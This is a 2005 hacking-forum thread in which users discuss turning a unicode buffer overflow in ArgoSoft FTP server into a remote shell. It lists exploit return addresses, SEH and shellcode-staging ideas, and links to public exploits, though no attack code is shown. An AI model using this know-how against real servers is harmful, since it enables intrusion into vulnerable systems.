 | |
| |||||||
| Home | Register | Projects | Blogs | FAQ | Calendar | Search | Today's Posts | Mark Forums Read | Free Directory | Free DNSReport | Tags |
| Notices |
| Hacking Discuss the art of hacking, your experiences, etc... |
unicode overflowsThis is a discussion on "unicode overflows" within the Hacking part of the Computer Security: Discussions section; once I wrote a PoC "http://www.milw0rm.com/id.php?id=908" for argosoft ftp to tell that the new version is still vuln . that time I really didnt give a try to get a shell . but ... |
 |
| | LinkBack | Thread Tools | Display Modes |
23-06-05
| |||
| |||
 unicode overflows once I wrote a PoC "http://www.milw0rm.com/id.php?id=908" for argosoft ftp to tell that the new version is still vuln . that time I really didnt give a try to get a shell . but now for educatinal purpose I am giving a new try to get shell but listen to the story : as it is a unicode overflow getting a shell is now easy and reliable . I went to the famus webdav unicode overflow exploits . 1) http://www.milw0rm.com/id.php?id=1 which is written by kralor , I went to undernet #coromputer and spoke to him about this he told me what to do , but as he is a bit lazy he didnt explained well (he is very nice) he mentined about high level memory addressing which could be useful , or finding a usable address which could be used in eip . 2) http://www.milw0rm.com/id.php?id=2 Roman explained very well but still many why's for me ! aha EIP = 0x00480004 he used , so I searched and I found some : ( xp sp1 addresses ) 002E00F0 ==> call EAX 00460023 ==> call ESI and other addresses for ESI but I dont see any use in them  . not pointing to anywhere useful note that we can use SEH too . I can send the shellcode with the command like CD before the overflow command and they wont be *censored**censored**censored**censored*ed up with 00 , but pointing to them is another problem . I want to know any of your ideas . specially about that high level memory addressing . until 1.4.2.9 is vuln .  |
| Sponsor | ||
| ||
| |
|
24-06-05
| ||||
| ||||
| Quote:
(from matt miller) it dumps every address of a loaded process, then you have to script a bit to find something usuable, else what you can do is to debug a lot the ftp server, and to see if you can redirect eip to a server function wich will helps you then to get back to your execution code, hmmm there is so much thing that u can do beeing able to overwrite 3 bytes , Im sure you will congrats to find something  |
|
24-06-05
| ||||
| ||||
| and binary |
|
24-06-05
| |||
| |||
| thank you for the information . I am giving a try , wont be an easy job :!: , shellcode address differs in others systems in the normal overflow , as I remember webdav exploits not used to work in many systems ! . I will do as u said ,I will work with that tool . |
|
01-07-05
| |||
| |||
| Check this -> http://www.milw0rm.com/id.php?id=1075 Was thinking of your writing, then this was planted on my desk..hehe, it actually works to, maybe move the file itself (PoC) i have bin/c here, to xpsp2k eip section, but then also, this is kinda advanced, and think it would be happier here , with some cool pizza eatin dudes (Yes, it compiles, fine, and no dont ask how or what shellcode addys to change, is not needed on this version  )I can supply help on this, in varied form of course depending on how/who, and yes,, it ill get shell, not tested outside my LAN but this is fine example of some advanced stuff wich is working. rehgards, hx |
|
| | |
| overflows, unicode | |
| Thread Tools | |
| Display Modes | |
Linear Mode
| |
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| CVE-2007-4771 (International Components for Unicode) | Heap | Advisories | 0 | 29-01-08 19:31 |
| CVE-2007-4770 (International Components for Unicode) | Heap | Advisories | 0 | 29-01-08 19:31 |
| heap plugin for olly | OllyDbg | 7 | 26-11-05 09:15 | |
| Buffer overflows trying to get this right | h3llfyr3 | Hacking | 0 | 17-09-05 16:31 |
